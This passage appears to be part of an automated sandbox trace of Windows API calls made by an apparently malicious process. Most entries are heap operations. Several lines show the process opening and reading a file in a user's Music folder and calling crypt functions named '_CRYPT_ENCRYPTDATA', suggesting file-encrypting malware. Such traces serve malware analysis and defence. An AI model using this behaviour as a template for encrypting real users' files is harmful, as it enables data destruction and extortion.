(HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0184.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0184.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0184.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0184.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0184.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0184.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0184.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0184.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0184.471] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz")) returned 0x10 [0184.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0184.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0184.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0184.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0184.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0184.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0184.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0184.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.flyingship.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\kqpdy.flyingship.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0184.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0184.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0184.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0184.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0184.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0184.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0184.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0184.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.473] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0184.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0184.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0184.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0184.473] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0184.474] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0184.474] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0184.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0184.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0184.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0184.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0184.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0184.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0184.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0184.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0184.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0184.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0184.475] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0184.475] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x1bd9, lpOverlapped=0x0) returned 1 [0184.477] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0184.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0184.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0184.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0184.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1bd9) returned 0x900490 [0184.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0184.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0184.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0184.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0184.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0184.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1bd9) returned 0x902078 [0184.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900490 | out: hHeap=0x8a0000) returned 1 [0184.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.478] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0184.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0184.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0184.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1bd9) returned 0x900490 [0184.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900490 | out: hHeap=0x8a0000) returned 1 [0184.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0184.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0184.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.479] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0184.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0184.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0184.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0184.479] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0184.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0184.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0184.479] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0184.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0184.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0184.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0184.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0184.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0184.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1bd9) returned 0x900490 [0184.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0184.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0184.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0184.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27c8 [0184.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0184.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0184.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0184.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0184.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0184.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba420 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1bd9) returned 0x903c60 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0184.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0184.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0184.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0184.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0184.482] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0184.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0184.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0184.482] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0184.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0184.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0184.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0184.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0184.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0184.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0184.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0184.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0184.482] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0184.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0184.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26e8 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0184.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0184.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0184.483] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0184.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0184.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0184.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0184.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0184.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0184.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0184.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0184.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0184.484] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0184.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0184.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0184.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0184.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0184.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0184.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0184.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0184.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0184.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0184.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0184.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0184.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0184.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0184.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0184.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0184.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0184.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0184.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0184.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.485] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0184.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 